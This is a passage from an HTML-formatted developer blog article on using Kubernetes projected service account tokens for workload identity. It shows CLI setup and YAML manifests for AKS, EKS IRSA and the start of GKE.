  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;nginx&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;token&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/tokens&lt;/span&gt;
      &lt;span class="na"&gt;readOnly&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;token&lt;/span&gt;
    &lt;span class="na"&gt;projected&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;sources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;serviceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;token&lt;/span&gt;
          &lt;span class="na"&gt;expirationSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3600&lt;/span&gt;
          &lt;span class="na"&gt;audience&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Using Projected Tokens with AKS (Azure Kubernetes Service)
&lt;/h2&gt;

&lt;p&gt;AKS leverages projected tokens for &lt;strong&gt;Workload Identity&lt;/strong&gt;, enabling pods to authenticate to Azure services without storing credentials.&lt;/p&gt;

&lt;h3&gt;
  
  
  Azure-Side Configuration
&lt;/h3&gt;

&lt;p&gt;Before using Workload Identity in AKS, you need to set up the Azure side:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Create an Azure AD application (or Managed Identity)&lt;/span&gt;
az ad sp create-for-rbac &lt;span class="nt"&gt;--name&lt;/span&gt; &lt;span class="s2"&gt;"myapp-workload-identity"&lt;/span&gt;

&lt;span class="c"&gt;# 2. Get the application's client ID&lt;/span&gt;
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;APPLICATION_CLIENT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"&amp;lt;your-client-id&amp;gt;"&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create federated identity credential that trusts your AKS cluster&lt;/span&gt;
az ad app federated-credential create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APPLICATION_CLIENT_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--parameters&lt;/span&gt; &lt;span class="s1"&gt;'{
    "name": "myapp-federated-credential",
    "issuer": "https://oidc.prod-aks.azure.com/&amp;lt;tenant-id&amp;gt;/&amp;lt;cluster-oidc-issuer-id&amp;gt;/",
    "subject": "system:serviceaccount:default:workload-identity-sa",
    "audiences": ["api://AzureADTokenExchange"]
  }'&lt;/span&gt;

&lt;span class="c"&gt;# 4. Assign Azure RBAC roles to the application&lt;/span&gt;
az role assignment create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assignee&lt;/span&gt; &lt;span class="nv"&gt;$APPLICATION_CLIENT_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt; &lt;span class="s2"&gt;"Storage Blob Data Contributor"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--scope&lt;/span&gt; &lt;span class="s2"&gt;"/subscriptions/&amp;lt;subscription-id&amp;gt;/resourceGroups/&amp;lt;rg-name&amp;gt;/providers/Microsoft.Storage/storageAccounts/&amp;lt;storage-account&amp;gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Key Configuration Points:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Issuer&lt;/strong&gt;: Your AKS cluster's OIDC issuer URL (unique per cluster)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Subject&lt;/strong&gt;: Must match the format &lt;code&gt;system:serviceaccount:&amp;lt;namespace&amp;gt;:&amp;lt;service-account-name&amp;gt;&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Audiences&lt;/strong&gt;: Must be &lt;code&gt;api://AzureADTokenExchange&lt;/code&gt; for Workload Identity&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  AKS Workload Identity Setup
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ServiceAccount&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;workload-identity-sa&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;azure.workload.identity/client-id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;YOUR_AZURE_CLIENT_ID"&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aks-workload-identity-demo&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
  &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;azure.workload.identity/use&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;true"&lt;/span&gt;  &lt;span class="c1"&gt;# This label triggers the webhook to inject volumes&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;workload-identity-sa&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;mcr.microsoft.com/azure-cli&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;sleep"&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;infinity"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="c1"&gt;# Note: The following are automatically injected by the AKS Workload Identity webhook&lt;/span&gt;
    &lt;span class="c1"&gt;# when the pod has the label "azure.workload.identity/use: true":&lt;/span&gt;
    &lt;span class="c1"&gt;# &lt;/span&gt;
    &lt;span class="c1"&gt;# Environment variables:&lt;/span&gt;
    &lt;span class="c1"&gt;# - AZURE_CLIENT_ID&lt;/span&gt;
    &lt;span class="c1"&gt;# - AZURE_TENANT_ID&lt;/span&gt;
    &lt;span class="c1"&gt;# - AZURE_FEDERATED_TOKEN_FILE&lt;/span&gt;
    &lt;span class="c1"&gt;# - AZURE_AUTHORITY_HOST&lt;/span&gt;
    &lt;span class="c1"&gt;#&lt;/span&gt;
    &lt;span class="c1"&gt;# Volume mounts:&lt;/span&gt;
    &lt;span class="c1"&gt;# - name: azure-identity-token&lt;/span&gt;
    &lt;span class="c1"&gt;#   mountPath: /var/run/secrets/azure/tokens&lt;/span&gt;
    &lt;span class="c1"&gt;#   readOnly: true&lt;/span&gt;
    &lt;span class="c1"&gt;#&lt;/span&gt;
    &lt;span class="c1"&gt;# Volumes:&lt;/span&gt;
    &lt;span class="c1"&gt;# - name: azure-identity-token&lt;/span&gt;
    &lt;span class="c1"&gt;#   projected:&lt;/span&gt;
    &lt;span class="c1"&gt;#     sources:&lt;/span&gt;
    &lt;span class="c1"&gt;#     - serviceAccountToken:&lt;/span&gt;
    &lt;span class="c1"&gt;#         path: azure-identity-token&lt;/span&gt;
    &lt;span class="c1"&gt;#         expirationSeconds: 3600&lt;/span&gt;
    &lt;span class="c1"&gt;#         audience: api://AzureADTokenExchange&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Important&lt;/strong&gt;: In practice, when using AKS Workload Identity, you typically only need to:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Annotate your service account with &lt;code&gt;azure.workload.identity/client-id&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Add the label &lt;code&gt;azure.workload.identity/use: "true"&lt;/code&gt; to your pod&lt;/li&gt;
&lt;li&gt;Reference that service account in your pod spec&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The pod spec would look like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aks-workload-identity-demo&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
  &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;azure.workload.identity/use&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;true"&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;workload-identity-sa&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;mcr.microsoft.com/azure-cli&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;sleep"&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;infinity"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="c1"&gt;# Everything else is auto-injected!&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;AKS will automatically inject the environment variables, volume mounts, and projected volumes for you through its mutating admission webhook.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How it works in AKS:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fumwe7phcpd6g5guol56z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fumwe7phcpd6g5guol56z.png" alt="aks" width="800" height="527"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Using Projected Tokens with EKS (Elastic Kubernetes Service)
&lt;/h2&gt;

&lt;p&gt;EKS uses projected tokens for &lt;strong&gt;IAM Roles for Service Accounts (IRSA)&lt;/strong&gt;, allowing pods to assume AWS IAM roles.&lt;/p&gt;

&lt;h3&gt;
  
  
  AWS-Side Configuration
&lt;/h3&gt;

&lt;p&gt;Before using IRSA in EKS, you need to configure AWS IAM:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Get your EKS cluster's OIDC provider URL&lt;/span&gt;
aws eks describe-cluster &lt;span class="nt"&gt;--name&lt;/span&gt; my-cluster &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"cluster.identity.oidc.issuer"&lt;/span&gt; &lt;span class="nt"&gt;--output&lt;/span&gt; text
&lt;span class="c"&gt;# Output: https://oidc.eks.us-west-2.amazonaws.com/id/EXAMPLED539D4633E53DE1B71EXAMPLE&lt;/span&gt;

&lt;span class="c"&gt;# 2. Create an IAM OIDC identity provider for your cluster&lt;/span&gt;
&lt;span class="c"&gt;# Note: If you created your cluster with eksctl or with OIDC enabled, this may already exist&lt;/span&gt;
&lt;span class="c"&gt;# You can verify with: aws iam list-open-id-connect-providers&lt;/span&gt;
eksctl utils associate-iam-oidc-provider &lt;span class="nt"&gt;--cluster&lt;/span&gt; my-cluster &lt;span class="nt"&gt;--approve&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create an IAM policy for S3 access&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; s3-policy.json &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "s3:GetObject",
        "s3:ListBucket"
      ],
      "Resource": [
        "arn:aws:s3:::my-bucket",
        "arn:aws:s3:::my-bucket/*"
      ]
    }
  ]
}
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;aws iam create-policy &lt;span class="nt"&gt;--policy-name&lt;/span&gt; S3AccessPolicy &lt;span class="nt"&gt;--policy-document&lt;/span&gt; file://s3-policy.json

&lt;span class="c"&gt;# 4. Create an IAM role with a trust policy that allows the service account&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; trust-policy.json &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::ACCOUNT_ID:oidc-provider/oidc.eks.us-west-2.amazonaws.com/id/EXAMPLED539D4633E53DE1B71EXAMPLE"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "oidc.eks.us-west-2.amazonaws.com/id/EXAMPLED539D4633E53DE1B71EXAMPLE:sub": "system:serviceaccount:default:s3-access-sa",
          "oidc.eks.us-west-2.amazonaws.com/id/EXAMPLED539D4633E53DE1B71EXAMPLE:aud": "sts.amazonaws.com"
        }
      }
    }
  ]
}
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;aws iam create-role &lt;span class="nt"&gt;--role-name&lt;/span&gt; s3-access-role &lt;span class="nt"&gt;--assume-role-policy-document&lt;/span&gt; file://trust-policy.json

&lt;span class="c"&gt;# 5. Attach the policy to the role&lt;/span&gt;
aws iam attach-role-policy &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role-name&lt;/span&gt; s3-access-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--policy-arn&lt;/span&gt; arn:aws:iam::ACCOUNT_ID:policy/S3AccessPolicy
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Key Configuration Points:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Trust Policy Condition&lt;/strong&gt;: Must match &lt;code&gt;system:serviceaccount:&amp;lt;namespace&amp;gt;:&amp;lt;service-account-name&amp;gt;&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Audience&lt;/strong&gt;: Must be &lt;code&gt;sts.amazonaws.com&lt;/code&gt; for IRSA&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OIDC Provider&lt;/strong&gt;: Must be registered as a trusted identity provider in IAM&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  EKS IRSA Configuration
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ServiceAccount&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;s3-access-sa&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;eks.amazonaws.com/role-arn&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;arn:aws:iam::ACCOUNT_ID:role/s3-access-role&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-irsa-demo&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;s3-access-sa&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;amazon/aws-cli&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;sleep"&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;infinity"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="c1"&gt;# Note: The following are automatically injected by the EKS Pod Identity Webhook&lt;/span&gt;
    &lt;span class="c1"&gt;# when the service account has the annotation "eks.amazonaws.com/role-arn":&lt;/span&gt;
    &lt;span class="c1"&gt;#&lt;/span&gt;
    &lt;span class="c1"&gt;# Environment variables:&lt;/span&gt;
    &lt;span class="c1"&gt;# - AWS_ROLE_ARN: arn:aws:iam::ACCOUNT_ID:role/s3-access-role&lt;/span&gt;
    &lt;span class="c1"&gt;# - AWS_WEB_IDENTITY_TOKEN_FILE: /var/run/secrets/eks.amazonaws.com/serviceaccount/token&lt;/span&gt;
    &lt;span class="c1"&gt;#&lt;/span&gt;
    &lt;span class="c1"&gt;# Volume mounts:&lt;/span&gt;
    &lt;span class="c1"&gt;# - name: aws-iam-token&lt;/span&gt;
    &lt;span class="c1"&gt;#   mountPath: /var/run/secrets/eks.amazonaws.com/serviceaccount&lt;/span&gt;
    &lt;span class="c1"&gt;#   readOnly: true&lt;/span&gt;
    &lt;span class="c1"&gt;#&lt;/span&gt;
    &lt;span class="c1"&gt;# Volumes:&lt;/span&gt;
    &lt;span class="c1"&gt;# - name: aws-iam-token&lt;/span&gt;
    &lt;span class="c1"&gt;#   projected:&lt;/span&gt;
    &lt;span class="c1"&gt;#     sources:&lt;/span&gt;
    &lt;span class="c1"&gt;#     - serviceAccountToken:&lt;/span&gt;
    &lt;span class="c1"&gt;#         path: token&lt;/span&gt;
    &lt;span class="c1"&gt;#         expirationSeconds: 86400&lt;/span&gt;
    &lt;span class="c1"&gt;#         audience: sts.amazonaws.com&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Important&lt;/strong&gt;: In practice, when using EKS with IRSA, you typically only need to:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Annotate your service account with &lt;code&gt;eks.amazonaws.com/role-arn&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Reference that service account in your pod spec&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The pod spec would look like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-irsa-demo&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;s3-access-sa&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;amazon/aws-cli&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;sleep"&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;infinity"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="c1"&gt;# Everything else is auto-injected!&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;EKS will automatically inject the environment variables, volume mounts, and projected volumes for you. The full configuration above is shown to illustrate what happens behind the scenes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How it works in EKS:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwd486g2inxone51qib7o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwd486g2inxone51qib7o.png" alt="eks" width="800" height="527"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Using Projected Tokens with GKE (Google Kubernetes Engine)
&lt;/h2&gt;

&lt;p&gt;GKE uses projected tokens for &lt;strong&gt;Workload Identity&lt;/strong&gt;, enabling pods to authenticate as Google Cloud service accounts.&lt;/p&gt;

&lt;h3&gt;
  
  
  GCP-Side Configuration
&lt;/h3&gt;

&lt;p&gt;Before using Workload Identity in GKE, you need to configure Google Cloud:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Enable Workload Identity on your GKE cluster (if not already enabled)&lt;/span&gt;
gcloud container clusters update my-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--workload-pool&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;PROJECT_ID.svc.id.goog

&lt;span class="c"&gt;# 2. Create a Google Cloud service account&lt;/span&gt;
gcloud iam service-accounts create gcs-access-sa &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"GCS Access Service Account"&lt;/span&gt;

&lt;span class="c"&gt;# 3. Grant the GCP service account permissions to Cloud resources&lt;/span&gt;
gcloud projects add-iam-policy-binding PROJECT_ID &lt;span class="se"&gt;\&lt;/span&gt;
